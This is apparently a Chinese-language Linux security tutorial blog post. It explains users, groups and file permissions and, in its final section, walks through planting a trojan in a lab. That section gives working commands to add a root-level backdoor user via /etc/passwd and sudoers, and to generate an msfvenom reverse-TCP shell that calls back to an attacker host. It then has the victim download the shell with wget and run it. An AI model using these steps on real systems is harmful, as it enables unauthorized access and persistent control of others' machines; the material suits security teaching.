Linux系统基础安全2
声明本文中所有操作均在合法合规的靶场环境、虚拟环境中进行。任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序、工具明知他人从事危害网络安全的活动的不得为其提供技术支持、广告推广、支付结算等帮助。本文章主要给大家介绍Linux系统中用户与组的概念、权限的管理并以攻击者的视角为大家演示Linux系统中木马是如何入侵的仅供学习植入后门用户新建用户useradd -m [用户名]设置密码passwd [用户名]临时以root权限执行指令sudo [具体命令]配置sudo权限usermod -aG sudo [用户名] #此命令是将用户添加到sudo用户组但通过cat /etc/group可直接看到不建议nano /etc/sudoers [用户名] ALL(ALL:ALL)ALL设置用户root权限nano /etc/passwd #在其中添加用户的root权限 [用户名]:x:0:0:root:/root:/bin/bash查看用户基本信息cat /etc/passwd #用户名密码用户ID组ID用户说明用户目录命令解释器查看用户密码cat /etc/shadowLinux用户与组管理用户user每个使用Linux系统的个体或进程都需要一个用户账户系统资源访问的最小权限单元root用户UID0拥有最高权限系统用户UID 1-999通常用于服务进程普通用户UID ≥1000手动创建的用户组group批量管理用户权限的集合主组用户创建文件时默认归属组附加组用户可加入的额外权限组Linux文件权限ls列出当前目录下文件ls -l列出当前目录下文件详细以图中红色框“drwxr-xr-x”为例第1位表示文件类型2、3、4位表示文件拥有者权限5、6、7位表示文件所属组用户权限8、9、10位表示其他用户权限。文件类型d表示目录l表示软链接b表示块设备c表示字符设备s表示socketp表示管道-表示普通文件权限r表示可读权限4w表示可写权限2x表示可执行权限1u表示拥有者g表示所属组o表示其他人Linux权限管理更改文件所有者chown 用户:用户组 test修改文件权限chmod 755 文件名 chmod urwx,grx,orx 文件名 chmod x 文件名 chmod ux 文件名 chmod g-x 文件名Linux之木马入侵木马是伪装成合法软件、隐蔽运行在目标设备中用于长期控制设备或窃取数据的恶意程序。肉鸡是被黑客通过木马等恶意程序秘密控制的设备。一、制作木马1.生成木马程序msfvenom -p linux/x64/shell/reverse_tcp LHOST攻击机ip(Kali) LPORT9999 -f elf -o shell.elf2.启动控制程序msfconsole use exploit/multi/handler set payload linux/x64/shell/reverse_tcp set lhost 攻击机ip(Kali) set lport 9999 run二、植入木马1.在kali中开始apache服务供Ubuntu下载#将当前目录下的 shell.elf 移动到 /var/www/html 目录 mv shell.elf /var/www/html #启动Apache提供下载服务 service apache2 start2.利用ssh控制ubuntu下载木马#从指定地址下载文件并保存为当前目录的shell.elf wget http://攻击者ip(Kali)/shell.elf -O shell.elf #注意是大写O指定下载文件的输出名称三、启动木马./shell.elf #启动下载的木马程序权限拒绝 ll #查看文件权限 或者 ls -l chmod x shell.elf #修改文件权限 ./shell.elf #增加执行权限后运行木马成功
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2433948.html
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!